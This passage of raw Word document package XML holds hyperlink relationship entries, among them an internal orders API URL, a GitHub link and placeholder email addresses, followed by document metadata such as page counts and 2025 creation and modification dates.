          </w:divBdr>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http://orders-service/api/v1/orders/123" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/yahoo/CMAK" TargetMode="External"/><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jane.smith@yahoo.com"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hyperlink" Target="http://www.example.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:john.doe@gmail.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1307</Pages>
  <Words>484146</Words>
  <Characters>2759638</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>22996</Lines>
  <Paragraphs>6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772</cp:revision>
  <cp:lastPrinted>2025-05-11T09:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-11T06:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-11T09:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>